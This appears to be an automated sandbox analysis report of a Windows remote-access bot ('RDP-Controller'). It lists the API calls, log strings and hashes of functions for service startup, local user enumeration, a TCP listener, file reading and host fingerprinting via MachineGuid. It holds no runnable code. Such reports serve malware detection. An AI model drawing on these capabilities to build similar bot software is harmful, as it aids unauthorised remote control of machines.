Snapshot File: hcaresult_20_2_7ffe0ebd0000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 4253334766-243243391
Opcode ID: ae06295473735462a982a09cf62c5e0a22a1fade5743064b87b26a330f433d8f
Instruction ID: 891903754cc5a00e15ca284753bd99bc89011566fcfb3e570f3b851e1414f7f6
Opcode Fuzzy Hash: ae06295473735462a982a09cf62c5e0a22a1fade5743064b87b26a330f433d8f
Instruction Fuzzy Hash: BA614C21E1C64786FB309F99A4443F92660AF51794F544232D8FE5B2F8FE7CA9448F81

Function 00007FF6BFD61CF3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNELBASE ref: 00007FF6BFD61D39
_mbscpy.MSVCRT ref: 00007FF6BFD61D54
FindFirstFileA.KERNEL32 ref: 00007FF6BFD61E27
GetLastError.KERNEL32 ref: 00007FF6BFD61E43
GetLastError.KERNEL32 ref: 00007FF6BFD61E72
FindClose.KERNEL32 ref: 00007FF6BFD61E90

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

Strings

(resume_handle != NULL), xrefs: 00007FF6BFD61DF9
fs_dir_list, xrefs: 00007FF6BFD61D90, 00007FF6BFD61DC8, 00007FF6BFD61E00, 00007FF6BFD61E5D, 00007FF6BFD61EA1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD61D97, 00007FF6BFD61DCF, 00007FF6BFD61E07
(path != NULL), xrefs: 00007FF6BFD61D89
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6BFD61D82, 00007FF6BFD61DBA, 00007FF6BFD61DF2
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FF6BFD61EA8
(name != NULL), xrefs: 00007FF6BFD61DC1
[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FF6BFD61E64

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
API String ID: 1094913617-243243391
Opcode ID: 4479868d61843783ce57a0bb4d40878a2ad77d6bec23207d6b7c491633aae95a
Instruction ID: cc370ea7fbef0c1cd4cf836caab0060818f6563c79cb632844c2725ddf2a286a
Opcode Fuzzy Hash: 4479868d61843783ce57a0bb4d40878a2ad77d6bec23207d6b7c491633aae95a
Instruction Fuzzy Hash: 4B611622E0D653A5FA60979CA4083B87350AF10B59F944732FB5ECB2F1DF6DA94583C1

Function 00007FFE0E16387F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0E16379F: GetProcessHeap.KERNEL32 ref: 00007FFE0E1637E7
Part of subcall function 00007FFE0E16379F: HeapFree.KERNEL32 ref: 00007FFE0E1637F8
Part of subcall function 00007FFE0E16379F: GetProcessHeap.KERNEL32 ref: 00007FFE0E16380C
Part of subcall function 00007FFE0E16379F: HeapFree.KERNEL32 ref: 00007FFE0E16381D
Part of subcall function 00007FFE0E16379F: LocalFree.KERNEL32 ref: 00007FFE0E163831
Part of subcall function 00007FFE0E16379F: LocalFree.KERNEL32 ref: 00007FFE0E163839
Part of subcall function 00007FFE0E16379F: GetProcessHeap.KERNEL32 ref: 00007FFE0E16384D
Part of subcall function 00007FFE0E16379F: HeapFree.KERNEL32 ref: 00007FFE0E16385E

NetApiBufferFree.NETAPI32 ref: 00007FFE0E163D97
NetUserEnum.NETAPI32 ref: 00007FFE0E163E0D
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E4B
HeapAlloc.KERNEL32 ref: 00007FFE0E163E5C
memcpy.MSVCRT ref: 00007FFE0E163E99
GetProcessHeap.KERNEL32 ref: 00007FFE0E163E9E
HeapFree.KERNEL32 ref: 00007FFE0E163EAF

Strings

[I] (%s) -> Done(sam_user_num=%u), xrefs: 00007FFE0E164038
mem_alloc, xrefs: 00007FFE0E1638A6
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E163EFE
[E] (%s) -> NetUserEnum failed(enum_err=%08lx), xrefs: 00007FFE0E163F27
users_sync, xrefs: 00007FFE0E163EF7, 00007FFE0E163F20, 00007FFE0E164031
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E1638AD

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: Heap$Free$Process$Local$AllocBufferEnumUsermemcpy
String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
API String ID: 1361071942-3382179125
Opcode ID: d8706a7d902b59c164108d338cbc47857dc36c1991d74cbb9efb23a04b1550c3
Instruction ID: dc138e19946267911f03a8b187d85b881c0a002bc9e3293308c104569fd147ad
Opcode Fuzzy Hash: d8706a7d902b59c164108d338cbc47857dc36c1991d74cbb9efb23a04b1550c3
Instruction Fuzzy Hash: 5661B422A0C60795FA209B54F8403BD6361AFC5B54F640137D9EE076F2EE3EE889C311

Function 00007FFE133015FA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE13301618
WSAGetLastError.WS2_32 ref: 00007FFE13301702

Part of subcall function 00007FFE1330152A: setsockopt.WS2_32 ref: 00007FFE1330155A

htonl.WS2_32 ref: 00007FFE1330164A
htons.WS2_32 ref: 00007FFE1330165B
bind.WS2_32 ref: 00007FFE13301674
listen.WS2_32 ref: 00007FFE13301689
WSAGetLastError.WS2_32 ref: 00007FFE1330169A

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

WSAGetLastError.WS2_32 ref: 00007FFE133016C4

Strings

tcp_listen, xrefs: 00007FFE133016AF, 00007FFE133016D9, 00007FFE13301713, 00007FFE13301747
[E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE133016E0
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE1330171A
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE1330174E
[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE133016B6

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
API String ID: 3590747132-3524496754
Opcode ID: 82738d66b74231e1c411ebf19cae2bd0d8602a741a7f23217e1e0b4753f74ced
Instruction ID: ee66d7c783ada8c997f8c866237170b8a69717bb8a2771e549591790edc0fe2e
Opcode Fuzzy Hash: 82738d66b74231e1c411ebf19cae2bd0d8602a741a7f23217e1e0b4753f74ced
Instruction Fuzzy Hash: 3A319565E08E06CAE6149B27A8045B9A290BF65BF4F041375E97E637F6DE3CE4058708

Function 00007FF6BFD68C4A Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 120stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FF6BFD68C62
strcmp.MSVCRT ref: 00007FF6BFD68C75
StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF6BFD68CB1
_read.MSVCRT ref: 00007FF6BFD68D07
GetLastError.KERNEL32 ref: 00007FF6BFD68D26

Part of subcall function 00007FF6BFD688EE: FreeLibrary.KERNEL32(?,?,00000000,0000013B444313D0,00007FF6BFD68CDE,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8), ref: 00007FF6BFD6892F
Part of subcall function 00007FF6BFD688EE: GetProcessHeap.KERNEL32(?,?,00000000,0000013B444313D0,00007FF6BFD68CDE,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8), ref: 00007FF6BFD68962
Part of subcall function 00007FF6BFD688EE: HeapFree.KERNEL32(?,?,00000000,0000013B444313D0,00007FF6BFD68CDE,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8), ref: 00007FF6BFD68973

Part of subcall function 00007FF6BFD689AA: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6BFD68CE3,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8,00000000), ref: 00007FF6BFD689DB
Part of subcall function 00007FF6BFD689AA: HeapFree.KERNEL32(?,?,00000000,00007FF6BFD68CE3,?,?,?,?,?,?,00000001,00007FF6BFD68E4A,?,?,00007FF6BFD784F8,00000000), ref: 00007FF6BFD689EC

Strings

standalone, xrefs: 00007FF6BFD68C58
RDP-Controller, xrefs: 00007FF6BFD68C82
[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu), xrefs: 00007FF6BFD68D38
main, xrefs: 00007FF6BFD68D31, 00007FF6BFD68E0B
service, xrefs: 00007FF6BFD68C6B, 00007FF6BFD68CC5
[E] (%s) -> No a valid run mode(mode=%s), xrefs: 00007FF6BFD68E12

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
API String ID: 3617873859-308889057
Opcode ID: 42f86d31ba7867ce5e87f8c186e311e3b151731fd0be31e8263105fe58cfcc7b
Instruction ID: 566ec606ec4bf29c913d67d9510554f19f9191332e4f9ae9e7e1a50e4afa8f42
Opcode Fuzzy Hash: 42f86d31ba7867ce5e87f8c186e311e3b151731fd0be31e8263105fe58cfcc7b
Instruction Fuzzy Hash: 6E51F710F0D643A5FB6097DDA4903797390AF18344F141632F74ECA2B2EE6EE9998792

Function 00007FF6BFD61131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,00007FF6BFD61313), ref: 00007FF6BFD6116E
_amsg_exit.MSVCRT(?,?,?,00007FF6BFD61313), ref: 00007FF6BFD6118D
_initterm.MSVCRT ref: 00007FF6BFD611AE
_initterm.MSVCRT ref: 00007FF6BFD611D3
SetUnhandledExceptionFilter.KERNEL32(?,?,?,00007FF6BFD61313), ref: 00007FF6BFD61212
malloc.MSVCRT ref: 00007FF6BFD61244
strlen.MSVCRT ref: 00007FF6BFD6125C
malloc.MSVCRT ref: 00007FF6BFD61268
_cexit.MSVCRT(?,?,?,00007FF6BFD61313), ref: 00007FF6BFD612E3

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
Instruction ID: 7b2eb3eb57e341484f5901f808c8b73554aadc4c30c049422223eea9475618f6
Opcode Fuzzy Hash: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
Instruction Fuzzy Hash: 93511722E09A4695FB529BA9E85127933A0BF48B99F144735EB0DCB3B5DE3CF4409380

Function 00007FFE0E162A1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0E162A42
WSAGetLastError.WS2_32 ref: 00007FFE0E162A5C

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0E162ABA
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0E162A7D
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0E162A95
tcp_recv, xrefs: 00007FFE0E162A76, 00007FFE0E162A8E, 00007FFE0E162AB3

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: cb83abf59dcf32c5503ea29b65ae6c5fbd71d82c662421a75d19843cd04b64a0
Instruction ID: cbae33de8d995b60b1cfc85d3e752cc0a42534c24a4539ffcac5814cd261a32d
Opcode Fuzzy Hash: cb83abf59dcf32c5503ea29b65ae6c5fbd71d82c662421a75d19843cd04b64a0
Instruction Fuzzy Hash: 44115E60E0C51792F6205729AD402B913516F45BF4F919333DCFD9AAF7EEACA946C300

Function 00007FF6BFD62515 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF6BFD6255A
fseek.MSVCRT ref: 00007FF6BFD62579
_errno.MSVCRT ref: 00007FF6BFD6258D
_errno.MSVCRT ref: 00007FF6BFD625A8
_errno.MSVCRT ref: 00007FF6BFD62667

Part of subcall function 00007FF6BFD699E2: fwrite.MSVCRT ref: 00007FF6BFD69A8E
Part of subcall function 00007FF6BFD699E2: fflush.MSVCRT ref: 00007FF6BFD69A9A

_errno.MSVCRT ref: 00007FF6BFD62682
_errno.MSVCRT ref: 00007FF6BFD626C0
fclose.MSVCRT ref: 00007FF6BFD62715
_errno.MSVCRT ref: 00007FF6BFD627B7
_errno.MSVCRT ref: 00007FF6BFD627D2

Strings

[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF6BFD62A4F
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF6BFD6295B
mem_alloc, xrefs: 00007FF6BFD6292D
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF6BFD6263C
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF6BFD62934
(buf_sz != NULL), xrefs: 00007FF6BFD62609
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF6BFD627C6
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF6BFD62676
NULL, xrefs: 00007FF6BFD62ABB
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6BFD625E4, 00007FF6BFD62617, 00007FF6BFD6264A
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6BFD62759
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6BFD625CF, 00007FF6BFD62602, 00007FF6BFD62635
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF6BFD62890
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF6BFD6259C
[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF6BFD62AD4
fs_file_read, xrefs: 00007FF6BFD62595, 00007FF6BFD625DD, 00007FF6BFD62610, 00007FF6BFD62643, 00007FF6BFD6266F, 00007FF6BFD62752, 00007FF6BFD627BF, 00007FF6BFD62889, 00007FF6BFD62954, 00007FF6BFD62A48, 00007FF6BFD62ACD
(path != NULL), xrefs: 00007FF6BFD625D6

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4162578512
Opcode ID: 22b100c5830f6336c3720d7b497c3ec90ad88d6a61efeae168927c580a299fcb
Instruction ID: b1cb6c801ad56ebd4f74222ba44cbefe229961d36321911a481ec82ef28d4bf9
Opcode Fuzzy Hash: 22b100c5830f6336c3720d7b497c3ec90ad88d6a61efeae168927c580a299fcb
Instruction Fuzzy Hash: 17D16C61A09A03A1EA209B9DE8447B93351BF55786F554732EB0ECB6F0DF3CE546C380

Function 00007FFE13306941 Relevance: 66.8, APIs: 10, Strings: 28, Instructions: 327
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE1330695C
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE13306989
CreateThread.KERNEL32 ref: 00007FFE133069D5
CreateThread.KERNEL32 ref: 00007FFE13306A35
CreateThread.KERNEL32 ref: 00007FFE13306A95
GetLastError.KERNEL32 ref: 00007FFE13306AEC
GetLastError.KERNEL32 ref: 00007FFE13306C08
GetLastError.KERNEL32 ref: 00007FFE13306CE0

Part of subcall function 00007FFE1330A202: fwrite.MSVCRT ref: 00007FFE1330A2AE
Part of subcall function 00007FFE1330A202: fflush.MSVCRT ref: 00007FFE1330A2BA

GetLastError.KERNEL32 ref: 00007FFE13306DE8

Part of subcall function 00007FFE1330A202: EnterCriticalSection.KERNEL32 ref: 00007FFE1330A2D3
Part of subcall function 00007FFE1330A202: LeaveCriticalSection.KERNEL32 ref: 00007FFE1330A2FB
Part of subcall function 00007FFE1330A202: CopyFileA.KERNEL32 ref: 00007FFE1330A358

GetLastError.KERNEL32 ref: 00007FFE13306EE6

Strings

, xrefs: 00007FFE13306F04
~, xrefs: 00007FFE13306E2E
routine_gc, xrefs: 00007FFE133069EB
P, xrefs: 00007FFE13306B6F
[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu), xrefs: 00007FFE13306CF2
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu), xrefs: 00007FFE13306C1A
P, xrefs: 00007FFE13306D2B
, xrefs: 00007FFE13306C26
, xrefs: 00007FFE13306CFE
~, xrefs: 00007FFE13306B6A
routine_accept, xrefs: 00007FFE13306A4B
~, xrefs: 00007FFE13306C86
Done, xrefs: 00007FFE13306ACD
[I] (%s) -> %s, xrefs: 00007FFE13306ADB
[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu), xrefs: 00007FFE13306EF8
[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu), xrefs: 00007FFE13306DFA
P, xrefs: 00007FFE13306C8F
routine_tx, xrefs: 00007FFE13306AAB
~, xrefs: 00007FFE13306D26
P, xrefs: 00007FFE13306F5E
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu), xrefs: 00007FFE13306AFE
~, xrefs: 00007FFE13306F59
server_init, xrefs: 00007FFE133069F2, 00007FFE13306A52, 00007FFE13306AB2, 00007FFE13306AD4, 00007FFE13306AF7, 00007FFE13306C13, 00007FFE13306CEB, 00007FFE13306DF3, 00007FFE13306EF1, 00007FFE13306FE4
P, xrefs: 00007FFE13306E33
, xrefs: 00007FFE13306B0A
[I] (%s) -> CreateThread(%s) done, xrefs: 00007FFE133069F9, 00007FFE13306A59, 00007FFE13306AB9
, xrefs: 00007FFE13306E06
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE13306FEB

Memory Dump Source

Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true

Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd

Similarity

API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
API String ID: 3214881788-719614687
Opcode ID: 3b00a8e53fa1ebf14ed1e77d3617b0821da378aa3e394c735acdf32d115a9638
Instruction ID: 537161c5d6a79bc065bc5b3a05efb7e8e6a1c5600923f98dc6da79c90d7a19a6
Opcode Fuzzy Hash: 3b00a8e53fa1ebf14ed1e77d3617b0821da378aa3e394c735acdf32d115a9638
Instruction Fuzzy Hash: F9F10560A0CF0389FB205B06A89437D2251EF35374F2443B2D57E662FADE6DB985A34D

Function 00007FFE11504BC0 Relevance: 58.0, APIs: 11, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE115044A4: LoadLibraryA.KERNEL32 ref: 00007FFE115044B2

Part of subcall function 00007FFE11504423: GetProcAddress.KERNEL32 ref: 00007FFE11504443

FreeLibrary.KERNEL32 ref: 00007FFE11504C53
GetNativeSystemInfo.KERNEL32 ref: 00007FFE11504C9F
GetWindowsDirectoryA.KERNEL32 ref: 00007FFE11504CB8
GetLastError.KERNEL32 ref: 00007FFE11504CC6

Strings

[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFE11505012
MachineGuid, xrefs: 00007FFE11504DE1
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFE11504E85
sys_init, xrefs: 00007FFE11504C31, 00007FFE11504C66, 00007FFE11504CD1, 00007FFE11504DAC, 00007FFE11504E7E, 00007FFE11504EBC, 00007FFE11504F75, 00007FFE1150500B, 00007FFE115050DA
, xrefs: 00007FFE11504E91
P, xrefs: 00007FFE11504EF0
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFE11504CD8
RtlGetVersion, xrefs: 00007FFE11504BE0
\, xrefs: 00007FFE11504E1E
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFE11504EC3
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFE115050E1
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFE11504F7C
:, xrefs: 00007FFE11504E19
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFE11504DB3
ntdll.dll, xrefs: 00007FFE11504BC8
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFE11504DE8
